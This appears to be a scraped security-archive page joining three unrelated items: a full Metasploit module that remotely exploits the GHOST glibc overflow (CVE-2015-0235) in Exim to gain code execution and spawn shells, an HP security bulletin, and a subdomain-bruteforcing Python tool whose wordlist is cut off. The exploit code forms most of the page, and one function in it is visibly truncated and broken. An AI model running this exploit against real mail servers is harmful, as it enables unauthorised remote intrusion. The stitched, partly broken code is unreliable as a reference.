Leaderboard

source: Offensive Security

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow', 'Description' => %q( This module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based buffer overflow in the GNU C Library's gethostbyname functions) on x86 and x86_64 GNU/Linux systems that run the Exim mail server. Technical information about the exploitation can be found in the original GHOST advisory, and in the source code of this module. ------------------------------------------------------------------------ SERVER-SIDE REQUIREMENTS (Exim) ------------------------------------------------------------------------ The remote system must use a vulnerable version of the GNU C Library: the first exploitable version is glibc-2.6, the last exploitable version is glibc-2.17; older versions might be exploitable too, but this module depends on the newer versions' fd_nextsize (a member of the malloc_chunk structure) to remotely obtain the address of Exim's smtp_cmd_buffer in the heap. ------------------------------------------------------------------------ The remote system must run the Exim mail server: the first exploitable version is exim-4.77; older versions might be exploitable too, but this module depends on the newer versions' 16-KB smtp_cmd_buffer to reliably set up the heap as described in the GHOST advisory. ------------------------------------------------------------------------ The remote Exim mail server must be configured to perform extra security checks against its SMTP clients: either the helo_try_verify_hosts or the helo_verify_hosts option must be enabled; the "verify = helo" ACL might be exploitable too, but is unpredictable and therefore not supported by this module. ------------------------------------------------------------------------ CLIENT-SIDE REQUIREMENTS (Metasploit) ------------------------------------------------------------------------ This module's "exploit" method requires the SENDER_HOST_ADDRESS option to be set to the IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim); additionally, this IPv4 address must have both forward and reverse DNS entries that match each other (Forward-Confirmed reverse DNS). ------------------------------------------------------------------------ The remote Exim server might be exploitable even if the Metasploit client has no FCrDNS, but this module depends on Exim's sender_host_name variable to be set in order to reliably control the state of the remote heap. ------------------------------------------------------------------------ TROUBLESHOOTING ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (nil)" failure: the SENDER_HOST_ADDRESS option was not specified. ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)" failure: the SENDER_HOST_ADDRESS option was specified, but not in IPv4 dotted-decimal notation. ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (helo_verify_hosts)" or "bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)" failure: the SENDER_HOST_ADDRESS option does not match the IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim). ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (no FCrDNS)" failure: the IPv4 address of the SMTP client (Metasploit) has no Forward-Confirmed reverse DNS. ------------------------------------------------------------------------ "not vuln? old glibc? (no leaked_arch)" failure: the remote Exim server is either not vulnerable, or not exploitable (glibc versions older than glibc-2.6 have no fd_nextsize member in their malloc_chunk structure). ------------------------------------------------------------------------ "NUL, CR, LF in addr? (no leaked_addr)" failure: Exim's heap address contains bad characters (NUL, CR, LF) and was therefore mangled during the information leak; this exploit is able to reconstruct most of these addresses, but not all (worst-case probability is ~1/85, but could be further improved). ------------------------------------------------------------------------ "Brute-force SUCCESS" followed by a nil reply, but no shell: the remote Unix command was executed, but spawned a bind-shell or a reverse-shell that failed to connect (maybe because of a firewall, or a NAT, etc). ------------------------------------------------------------------------ "Brute-force SUCCESS" followed by a non-nil reply, and no shell: the remote Unix command was executed, but failed to spawn the shell (maybe because the setsid command doesn't exist, or awk isn't gawk, or netcat doesn't support the -6 or -e option, or telnet doesn't support the -z option, etc). ------------------------------------------------------------------------ Comments and questions are welcome! ), 'Author' => ['Qualys, Inc. <qsa[at]qualys.com>'], 'License' => BSD_LICENSE, 'References' => [ ['CVE', '2015-0235'], ['US-CERT-VU', '967332'], ['OSVDB', '117579'], ['BID', '72325'], ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt'] ], 'DisclosureDate' => 'Jan 27 2015', 'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim) 'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload 'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^ 'Payload' => { 'Space' => 255, # the shorter the payload, the higher the probability of code execution 'BadChars' => "", # we encode the payload ourselves, because ^ 'DisableNops' => true, 'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell }, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0 )) register_options([ Opt::RPORT(25), OptAddress.new('SENDER_HOST_ADDRESS', [false, 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil]) ], self.class) register_advanced_options([ OptBool.new('I_KNOW_WHAT_I_AM_DOING', [false, 'Please read the source code for details', nil]) ], self.class) end def check # for now, no information about the vulnerable state of the target check_code = Exploit::CheckCode::Unknown begin # not exploiting, just checking smtp_connect(false) # malloc()ate gethostbyname's buffer, and # make sure its next_chunk isn't the top chunk 9.times do smtp_send("HELO ", "", "0", "", "", 1024+16-1+0) smtp_recv(HELO_CODES) end # overflow (4 bytes) gethostbyname's buffer, and # overwrite its next_chunk's size field with 0x00303030 smtp_send("HELO ", "", "0", "", "", 1024+16-1+4) # from now on, an exception means vulnerable check_code = Exploit::CheckCode::Vulnerable # raise an exception if no valid SMTP reply reply = smtp_recv(ANY_CODE) # can't determine vulnerable state if smtp_verify_helo() isn't called return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/ # realloc()ate gethostbyname's buffer, and # crash (old glibc) or abort (new glibc) # on the overwritten size field smtp_send("HELO ", "", "0", "", "", 2048-16-1+4) # raise an exception if no valid SMTP reply reply = smtp_recv(ANY_CODE) # can't determine vulnerable state if smtp_verify_helo() isn't called return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/ # a vulnerable target should've crashed by now check_code = Exploit::CheckCode::Safe rescue peer = "#{rhost}:#{rport}" vprint_debug("#{peer} - Caught #{$!.class}: #{$!.message}") ensure smtp_disconnect end return check_code end def exploit unless datastore['I_KNOW_WHAT_I_AM_DOING'] print_status("Checking if target is vulnerable...") fail_with("exploit", "Vulnerability check failed.") if check != Exploit::CheckCode::Vulnerable print_good("Target is vulnerable.") end information_leak code_execution end private HELO_CODES = '250|451|550' ANY_CODE = '[0-9]{3}' MIN_HEAP_SHIFT = 80 MIN_HEAP_SIZE = 128 * 1024 MAX_HEAP_SIZE = 1024 * 1024 # Exim ALIGNMENT = 8 STORE_BLOCK_SIZE = 8192 STOREPOOL_MIN_SIZE = 256 LOG_BUFFER_SIZE = 8192 BIG_BUFFER_SIZE = 16384 SMTP_CMD_BUFFER_SIZE = 16384 IN_BUFFER_SIZE = 8192 # GNU C Library PREV_INUSE = 0x1 NS_MAXDNAME = 1025 # Linux MMAP_MIN_ADDR = 65536 def information_leak print_status("Trying information leak...") leaked_arch = nil leaked_addr = [] # try different heap_shift values, in case Exim's heap address contains # bad chars (NUL, CR, LF) and was mangled during the information leak; # we'll keep the longest one (the least likely to have been truncated) 16.times do done = catch(:another_heap_shift) do heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15) print_debug("#{{ heap_shift: heap_shift }}") # write the malloc_chunk header at increasing offsets (8-byte step), # until we overwrite the "503 sender not yet given" error message 128.step(256, 8) do |write_offset| error = try_information_leak(heap_shift, write_offset) print_debug("#{{ write_offset: write_offset, error: error }}") throw(:another_heap_shift) if not error next if error == "503 sender not yet given" # try a few more offsets (allows us to double-check things, # and distinguish between 32-bit and 64-bit machines) error = [error] 1.upto(5) do |i| error[i] = try_information_leak(heap_shift, write_offset + i*8) throw(:another_heap_shift) if not error[i] end print_debug("#{{ error: error }}") _leaked_arch = leaked_arch if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd (error[4] =~ /\A503 send[^e].?\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size (error[5] == "177") # the last \x7F of our BAD1 command, encoded as \\177 by string_printing() leaked_arch = ARCH_X86_64 elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize (error[1].empty? or (error[1].unpack('C')[0] & 3) == 0) and # fd (error[2] =~ /\A503 [^s].?\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size (error[3] == "177") # the last \x7F of our BAD1 command, encoded as \\177 by string_printing() leaked_arch = ARCH_X86 else throw(:another_heap_shift) end print_debug("#{{ leaked_arch: leaked_arch }}") fail_with("infoleak", "arch changed") if _leaked_arch and _leaked_arch != leaked_arch # try different large-bins: most of them should be empty, # so keep the most frequent fd_nextsize address # (a pointer to the malloc_chunk itself) count = Hash.new(0) 0.upto(9) do |last_digit| error = try_information_leak(heap_shift, write_offset, last_digit) next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK count[error] += 1 end print_debug("#{{ count: count }}") throw(:another_heap_shift) if count.empty? # convert count to a nested array of [key, value] arrays and sort it error_count = count.sort { |a, b| b[1] <=> a[1] } error_count = error_count.first # most frequent error = error_count[0] count = error_count[1] throw(:another_heap_shift) unless count >= 6 # majority leaked_addr.push({ error: error, shift: heap_shift }) # common-case shortcut if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == "er not yet given") or (leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count("\x7E-\x7F").nonzero?) leaked_addr = [leaked_addr.last] # use this one, and not another throw(:another_heap_shift, true) # done end throw(:another_heap_shift) end throw(:another_heap_shift) end break if done end fail_with("infoleak", "not vuln? old glibc? (no leaked_arch)") if leaked_arch.nil? fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr.empty? leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length } leaked_addr = leaked_addr.first # longest error = leaked_addr[:error] shift = leaked_addr[:shift] leaked_addr = 0 (leaked_arch == ARCH_X86 ? 4 : 8).times do |i| break if i >= error.length leaked_addr += error.unpack('C*')[i] * (2**(i*8)) end # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer: leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr <= MMAP_MIN_ADDR print_good("Successfully leaked_arch: #{leaked_arch}") print_good("Successfully leaked_addr: #{leaked_addr.to_s(16)}") @leaked = { arch: leaked_arch, addr: leaked_addr } end def try_information_leak(heap_shift, write_offset, last_digit = 9) fail_with("infoleak", "heap_shift") if (heap_shift < MIN_HEAP_SHIFT) fail_with("infoleak", "heap_shift") if (heap_shift & 15) != 0 fail_with("infoleak", "write_offset") if (write_offset & 7) != 0 fail_with("infoleak", "last_digit") if "#{last_digit}" !~ /\A[0-9]\z/ smtp_connect # bulletproof Heap Feng Shui; the hard part is avoiding: # "Too many syntax or protocol errors" (3) # "Too many unrecognized commands" (3) # "Too many nonmail commands" (10) smtp_send("HELO ", "", "0", @sender # avoid a future pathological case by forcing it now: # "Do NOT free the first successor, if our current block has less than 256 bytes left." smtp_send("MAIL FROM:", "<", method(:rand_text_alpha), ">", "", STOREPOOL_MIN_SIZE + 16) smtp_recv(501, 'sender address must contain a domain') smtp_send("RSET") smtp_recv(250, 'Reset OK') end def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil) fail_with("smtp_send", "state is #{@smtp_state}") if @smtp_state != :send @smtp_state = :sending if not arg_pattern fail_with("smtp_send", "prefix is nil") if not prefix fail_with("smtp_send", "param isn't nil") if arg_prefix or arg_suffix or suffix or arg_length command = prefix else fail_with("smtp_send", "param is nil") unless prefix and arg_prefix and arg_suffix and suffix and arg_length length = arg_length - arg_prefix.length - arg_suffix.length fail_with("smtp_send", "len is #{length}") if length <= 0 argument = arg_prefix case arg_pattern when String argument += arg_pattern * (length / arg_pattern.length) argument += arg_pattern[0, length % arg_pattern.length] when Method argument += arg_pattern.call(length) end argument += arg_suffix fail_with("smtp_send", "arglen is #{argument.length}, not #{arg_length}") if argument.length != arg_length command = prefix + argument + suffix end fail_with("smtp_send", "invalid char in cmd") if command.count("^\x20-\x7F") > 0 fail_with("smtp_send", "cmdlen is #{command.length}") if command.length > SMTP_CMD_BUFFER_SIZE command += "\n" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer # the following loop works around a bug in the put() method: # "while (send_idx < send_len)" should be "while (send_idx < buf.length)" # (or send_idx and/or send_len could be removed altogether, like here) while command and not command.empty? num_sent = sock.put(command) fail_with("smtp_send", "sent is #{num_sent}") if num_sent <= 0 fail_with("smtp_send", "sent is #{num_sent}, greater than #{command.length}") if num_sent > command.length command = command[num_sent..-1] end @smtp_state = :recv end def smtp_recv(expected_code = nil, expected_data = nil) fail_with("smtp_recv", "state is #{@smtp_state}") if @smtp_state != :recv @smtp_state = :recving failure = catch(:failure) do # parse SMTP replies very carefully (the information # leak injects arbitrary data into multiline replies) data = "" while data !~ /(\A|\r\n)[0-9]{3}[ ].*\r\n\z/mn begin more_data = sock.get_once rescue throw(:failure, "Caught #{$!.class}: #{$!.message}") end throw(:failure, "no more data") if more_data.nil? throw(:failure, "no more data") if more_data.empty? data += more_data end throw(:failure, "malformed reply (count)") if data.count("\0") > 0 lines = data.scan(/(?:\A|\r\n)[0-9]{3}[ -].*?(?=\r\n(?=[0-9]{3}[ -]|\z))/mn) throw(:failure, "malformed reply (empty)") if lines.empty? code = nil lines.size.times do |i| lines[i].sub!(/\A\r\n/mn, "") lines[i] += "\r\n" if i == 0 code = lines[i][0,3] throw(:failure, "bad code") if code !~ /\A[0-9]{3}\z/mn if expected_code and code !~ /\A(#{expected_code})\z/mn throw(:failure, "unexpected #{code}, expected #{expected_code}") end end line_begins_with = lines[i][0,4] line_should_begin_with = code + (i == lines.size-1 ? " " : "-") if line_begins_with != line_should_begin_with throw(:failure, "line begins with #{line_begins_with}, " \ "should begin with #{line_should_begin_with}") end end throw(:failure, "malformed reply (join)") if lines.join("") != data if expected_data and data !~ /#{expected_data}/mn throw(:failure, "unexpected data") end reply = { code: code, lines: lines } @smtp_state = :send return reply end fail_with("smtp_recv", "#{failure}") if expected_code return nil end def smtp_disconnect disconnect if sock fail_with("smtp_disconnect", "sock isn't nil") if sock @smtp_state = :disconnected end end Source

HP Security Bulletin HPSBST03298 1 - Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes. Code: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04600552 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04600552 Version: 1 HPSBST03298 rev.1 - HP XP Service Processor Software for Windows, Multiple Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-03-13 Last Updated: 2015-03-13 - ----------------------------------------------------------------------------- - --- Potential Security Impact: Multiple vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes. References: SSRT101826 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The following HP XP Service Processor Software for Windows is affected: HP XP7 HP XP10000 HP XP12000 HP XP20000 HP XP24000 HP XP P9500 BACKGROUND For a PGP signed version of this security bulletin please write to: security-alert@hp.com Microsoft has published Security Information Bulletins since January 2009. This bulletin presents all of the necessary patches and updates for HP XP Service Processor Software in a cummulative format. This information is updated monthly. Updating the HP XP Service Processor Software can be performed without interference or distruption to data flow on the XP product. RESOLUTION HP has made a web-based spread sheet available which lists all updates to the HP XP Service Processor Software that runs on the Microsoft Windows Operating System. The OS versions include Windows 7, Window Vista (64 and 32 bit) and Windows XP. The document may be downloaded from here: HP Insight Management - Overview In this HP Enterprise Information LIbrary , Select 'Storage' at the top, In the 'Products and Solutions' column, select 'XP Storage', In the 'Information Type' column, select only 'Service and Maintenance'. The HP XP Service Processor (SVP) OS Security Patch Summary Sheet may be downloaded to your desktop. HISTORY Version:1 (rev.1) - 13 March 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: HP: Subscribe today Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned here in may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlUHov8ACgkQ4B86/C0qfVnbrgCg4oVyYhIvPf8/mkS/IwjWrMRg blEAn3uS87tqYInkFZtz8QNOjlVcU7l0 =6XaT -----END PGP SIGNATURE----- Source: http://dl.packetstormsecurity.net/1503-advisories/HPSBST03298-1.txt

#!/usr/bin/env python2 # -*- coding: latin-1 -*- ###################################################### # ____ _ __ # # ___ __ __/ / /__ ___ ______ ______(_) /___ __ # # / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / # # /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / # # /___/ team # # # # dnsspider.py - multithreaded subdomain bruteforcer # # # # DATE # # 08/16/2012 # # # # DESCRIPTION # # A very fast multithreaded bruteforcer of subdomains that leverages a # # wordlist and/or character permutation. # # # # AUTHOR # # noptrix - http://www.nullsecurity.net/ # # # # NOTES: # # quick'n'dirty code # # # # TODO: # # - attack while mutating -> don't generate whole list when using -t 1 # # # # CHANGELOG: # # v0.6 # # - upgraded default wordlist # # - replaced optionparser with argparse # # - add version output option # # - fixed typo # # # # v0.5 # # - fixed extracted ip addresses from rrset answers # # - renamed file (removed version string) # # - removed trailing whitespaces # # - removed color output # # - changed banner # # # # v0.4 # # - fixed a bug for returned list # # - added postfix option # # - upgraded wordlist[] # # - colorised output # # - changed error messages # # # # v0.3: # # - added verbose/quiet mode - default is quiet now # # - fixed try/catch for domainnames # # - fixed some tab width (i normally use <= 80 chars per line) # # # # v0.2: # # - append DNS and IP output to found list # # - added diffound list for subdomains resolved to different addresses # # - get right ip address from current used iface to avoid socket problems # # - fixed socket exception syntax and output # # - added usage note for fixed port and multithreaded socket exception # # # # v0.1: # # - initial release # ################################################################################ import sys import time import string import itertools import socket import threading import re import argparse try: import dns.message import dns.query except ImportError: print("[-] ERROR: you need 'dnspython' package") sys.exit() BANNER = '--==[ dnsspider by noptrix@nullsecurity.net ]==--' USAGE = '\n\n' \ ' dnsspider.py -t <arg> -a <arg> [options]' VERSION = 'v0.6' defaults = {} hostnames = [] prefix = '' postfix = '' found = [] diffound = [] chars = string.ascii_lowercase digits = string.digits # default wordlist wordlist = [ '0', '01', '02', '03', '1', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '2', '20', '3', '3com', '4', '5', '6', '7', '8', '9', 'ILMI', 'a', 'a.auth-ns', 'a01', 'a02', 'a1', 'a2', 'abc', 'about', 'ac', 'academico', 'acceso', 'access', 'accounting', 'accounts', 'acid', 'activestat', 'ad', 'adam', 'adkit', 'adm', 'admin', 'administracion', 'administrador', 'administrator', 'administrators', 'admins', 'ads', 'adserver', 'adsl', 'ae', 'af', 'affiliate', 'affiliates', 'afiliados', 'ag', 'agenda', 'agent', 'ai', 'aix', 'ajax', 'ak', 'akamai', 'al', 'alabama', 'alaska', 'albuquerque', 'alerts', 'alpha', 'alterwind', 'am', 'amarillo', 'americas', 'an', 'anaheim', 'analyzer', 'announce', 'announcements', 'antivirus', 'ao', 'ap', 'apache', 'apollo', 'app', 'app01', 'app1', 'apple', 'application', 'applications', 'apps', 'appserver', 'aq', 'ar', 'archie', 'arcsight', 'argentina', 'arizona', 'arkansas', 'arlington', 'as', 'as400', 'asia', 'asterix', 'at', 'athena', 'atlanta', 'atlas', 'att', 'au', 'auction', 'austin', 'auth', 'auto', 'autodiscover', 'autorun', 'av', 'aw', 'ayuda', 'az', 'b', 'b.auth-ns', 'b01', 'b02', 'b1', 'b2', 'b2b', 'b2c', 'ba', 'back', 'backend', 'backup', 'backups', 'baker', 'bakersfield', 'balance', 'balancer', 'baltimore', 'banking', 'bayarea', 'bb', 'bbdd', 'bbs', 'bd', 'bdc', 'be', 'bea', 'beta', 'bf', 'bg', 'bh', 'bi', 'bill', 'billing', 'biz', 'biztalk', 'bj', 'black', 'blackberry', 'blog', 'blogs', 'blue', 'bm', 'bn', 'bnc', 'bo', 'board', 'bob', 'bof', 'boise', 'bolsa', 'border', 'boston', 'boulder', 'boy', 'br', 'bravo', 'brazil', 'britian', 'broadcast', 'broker', 'bronze', 'brown', 'bs', 'bsd', 'bsd0', 'bsd01', 'bsd02', 'bsd1', 'bsd2', 'bt', 'bug', 'buggalo', 'bugs', 'bugzilla', 'build', 'bulletins', 'burn', 'burner', 'buscador', 'buy', 'bv', 'bw', 'by', 'bz', 'c', 'c.auth-ns', 'ca', 'cache', 'cafe', 'calendar', 'california', 'call', 'calvin', 'canada', 'canal', 'canon', 'careers', 'cart', 'catalog', 'cc', 'cd', 'cdburner', 'cdn', 'central', 'cert', 'certificates', 'certify', 'certserv', 'certsrv', 'cf', 'cg', 'cgi', 'ch', 'channel', 'channels', 'charlie', 'charlotte', 'chat', 'chats', 'chatserver', 'check', 'checkpoint', 'chi', 'chicago', 'ci', 'cims', 'cincinnati', 'cisco', 'citrix', 'ck', 'cl', 'class', 'classes', 'classifieds', 'classroom', 'cleveland', 'cli', 'clicktrack', 'client', 'clientes', 'clients', 'club', 'clubs', 'cluster', 'clusters', 'cm', 'cmail', 'cms', 'cn', 'co', 'cocoa', 'code', 'coldfusion', 'colombus', 'colorado', 'columbus', 'com', 'commerce', 'commerceserver', 'communigate', 'community', 'compaq', 'compras', 'con', 'concentrator', 'conf', 'conference', 'conferencing', 'confidential', 'connect', 'connecticut', 'consola', 'console', 'consult', 'consultant', 'consultants', 'consulting', 'consumer', 'contact', 'content', 'contracts', 'control', 'controller', 'core', 'core0', 'core01', 'corp', 'corpmail', 'corporate', 'correo', 'correoweb', 'cortafuegos', 'counterstrike', 'courses', 'cr', 'cricket', 'crm', 'crs', 'cs', 'cso', 'css', 'ct', 'cu', 'cust1', 'cust10', 'cust100', 'cust101', 'cust102', 'customer', 'customers', 'cv', 'cvs', 'cx', 'cy', 'cz', 'd', 'dallas', 'data', 'database', 'database01', 'database02', 'database1', 'database2', 'databases', 'datastore', 'datos', 'david', 'db', 'db0', 'db01', 'db02', 'db1', 'db2', 'dc', 'de', 'dealers', 'dec', 'def', 'default', 'defiant', 'delaware', 'dell', 'delta', 'delta1', 'demo', 'demonstration', 'demos', 'denver', 'depot', 'des', 'desarrollo', 'descargas', 'design', 'designer', 'desktop', 'detroit', 'dev', 'dev0', 'dev01', 'dev1', 'devel', 'develop', 'developer', 'developers', 'development', 'device', 'devserver', 'devsql', 'dhcp', 'dial', 'dialup', 'digital', 'dilbert', 'dir', 'direct', 'directory', 'disc', 'discovery', 'discuss', 'discussion', 'discussions', 'disk', 'disney', 'distributer', 'distributers', 'dj', 'dk', 'dm', 'dmail', 'dmz', 'dnews', 'dns', 'dns-2', 'dns0', 'dns1', 'dns2', 'dns3', 'do', 'doc', 'docs', 'document', 'documentacion', 'documentos', 'domain', 'domains', 'dominio', 'domino', 'dominoweb', 'doom', 'download', 'downloads', 'downtown', 'dragon', 'drupal', 'dsl', 'dyn', 'dynamic', 'dynip', 'dz', 'e', 'e-com', 'e-commerce', 'e0', 'eaccess', 'eagle', 'earth', 'east', 'ec', 'echo', 'ecom', 'ecommerce', 'edi', 'edu', 'education', 'edward', 'ee', 'eg', 'eh', 'ejemplo', 'elpaso', 'email', 'employees', 'empresa', 'empresas', 'en', 'enable', 'eng', 'eng01', 'eng1', 'engine', 'engineer', 'engineering', 'enterprise', 'epsilon', 'er', 'erp', 'es', 'esd', 'esm', 'espanol', 'estadisticas', 'esx', 'et', 'eta', 'europe', 'events', 'example', 'examples', 'exchange', 'exec', 'exit', 'ext', 'extern', 'external', 'extranet', 'f', 'f5', 'falcon', 'farm', 'faststats', 'fax', 'feedback', 'feeds', 'fi', 'field', 'file', 'files', 'fileserv', 'fileserver', 'filestore', 'filter', 'finance', 'find', 'finger', 'firewall', 'fix', 'fixes', 'fj', 'fk', 'fl', 'flash', 'florida', 'flow', 'fm', 'fo', 'foobar', 'formacion', 'foro', 'foros', 'fortworth', 'forum', 'forums', 'foto', 'fotos', 'foundry', 'fox', 'foxtrot', 'fr', 'france', 'frank', 'fred', 'freebsd', 'freebsd0', 'freebsd01', 'freebsd02', 'freebsd1', 'freebsd2', 'freeware', 'fresno', 'front', 'frontdesk', 'fs', 'fsp', 'ftp', 'ftp-', 'ftp0', 'ftp2', 'ftpserver', 'fw', 'fw-1', 'fw1', 'fwsm', 'fwsm0', 'fwsm01', 'fwsm1', 'g', 'ga', 'galeria', 'galerias', 'galleries', 'gallery', 'games', 'gamma', 'gandalf', 'gate', 'gatekeeper', 'gateway', 'gauss', 'gd', 'ge', 'gemini', 'general', 'george', 'georgia', 'germany', 'gf', 'gg', 'gh', 'gi', 'git', 'gl', 'glendale', 'gm', 'gmail', 'gn', 'go', 'gold', 'goldmine', 'golf', 'gopher', 'gp', 'gq', 'gr', 'green', 'group', 'groups', 'groupwise', 'gs', 'gsx', 'gt', 'gu', 'guest', 'gw', 'gw1', 'gy', 'h', 'hal', 'halflife', 'hawaii', 'hello', 'help', 'helpdesk', 'helponline', 'henry', 'hermes', 'hi', 'hidden', 'hk', 'hm', 'hn', 'hobbes', 'hollywood', 'home', 'homebase', 'homer', 'honeypot', 'honolulu', 'host', 'host1', 'host3', 'host4', 'host5', 'hotel', 'hotjobs', 'houstin', 'houston', 'howto', 'hp', 'hpc', 'hpov', 'hr', 'ht', 'http', 'https', 'hu', 'hub', 'humanresources', 'i', 'ia', 'ias', 'ibm', 'ibmdb', 'id', 'ida', 'idaho', 'ids', 'ie', 'iis', 'il', 'illinois', 'im', 'image', 'images', 'imail', 'imap', 'imap4', 'img', 'img0', 'img01', 'img02', 'imgs', 'in', 'inbound', 'inc', 'include', 'incoming', 'india', 'indiana', 'indianapolis', 'info', 'informix', 'inside', 'install', 'int', 'interface', 'intern', 'internal', 'international', 'internet', 'intl', 'intranet', 'invalid', 'investor', 'investors', 'io', 'iota', 'iowa', 'ip6', 'iplanet', 'ipmonitor', 'ipsec', 'ipsec-gw', 'ipv6', 'iq', 'ir', 'irc', 'ircd', 'ircserver', 'ireland', 'iris', 'irvine', 'irving', 'is', 'isa', 'isaserv', 'isaserver', 'ism', 'israel', 'isync', 'it', 'italy', 'ix', 'j', 'jabber', 'japan', 'java', 'jboss', 'je', 'jedi', 'jm', 'jo', 'jobs', 'john', 'jp', 'jrun', 'juegos', 'juliet', 'juliette', 'juniper', 'jupiter', 'k', 'kansas', 'kansascity', 'kappa', 'kb', 'ke', 'kentucky', 'kerberos', 'keynote', 'kg', 'kh', 'ki', 'kilo', 'king', 'km', 'kn', 'knowledgebase', 'knoxville', 'koe', 'korea', 'kp', 'kr', 'ks', 'kw', 'ky', 'kz', 'l', 'la', 'lab', 'laboratory', 'labs', 'lambda', 'lan', 'laptop', 'laserjet', 'lasvegas', 'launch', 'lb', 'lc', 'ldap', 'legal', 'leo', 'li', 'lib', 'library', 'lima', 'lincoln', 'link', 'linux', 'linux0', 'linux01', 'linux02', 'linux1', 'linux2', 'lista', 'lists', 'listserv', 'listserver', 'live', 'lk', 'load', 'loadbalancer', 'local', 'localhost', 'log', 'log0', 'log01', 'log02', 'log1', 'log2', 'logfile', 'logfiles', 'logger', 'logging', 'loghost', 'login', 'logs', 'london', 'longbeach', 'losangeles', 'lotus', 'louisiana', 'lr', 'ls', 'lt', 'lu', 'luke', 'lv', 'ly', 'lyris', 'm', 'ma', 'mac', 'mac1', 'mac10', 'mac11', 'mac2', 'mac3', 'mac4', 'mac5', 'mach', 'macintosh', 'madrid', 'mail', 'mail2', 'mailer', 'mailgate', 'mailhost', 'mailing', 'maillist', 'maillists', 'mailroom', 'mailserv', 'mailsite', 'mailsrv', 'main', 'maine', 'maint', 'mall', 'manage', 'management', 'manager', 'managers', 'manufacturing', 'map', 'mapas', 'maps', 'marketing', 'marketplace', 'mars', 'marvin', 'mary', 'maryland', 'massachusetts', 'master', 'max', 'mc', 'mci', 'md', 